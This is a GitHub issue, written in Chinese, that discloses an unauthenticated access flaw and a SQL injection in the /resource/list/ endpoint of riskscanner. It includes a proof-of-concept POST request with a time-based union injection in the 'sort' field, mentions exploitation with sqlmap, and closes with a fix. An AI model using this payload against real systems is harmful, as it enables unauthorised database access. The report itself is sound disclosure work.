You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Apr 17, 2023. It is now read-only.
在对riskscanner进行入网安全检测的时候。发现其在/resource/list/接口存在未授权获取数据安全漏洞
通过构造该接口的请求发现该接口存在sql注入漏洞。
构造poc
POST /resource/list/1/10 HTTP/1.1
Host: xxx
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/json;charset=UTF-8
{"sort":"1)a union select sleep(5) -- -"}
利用sqlmap工具进行利用
证明漏洞
修复建议。对接口进行强制鉴权。并在后端服务当中对sql语句进行预编译
The text was updated successfully, but these errors were encountered: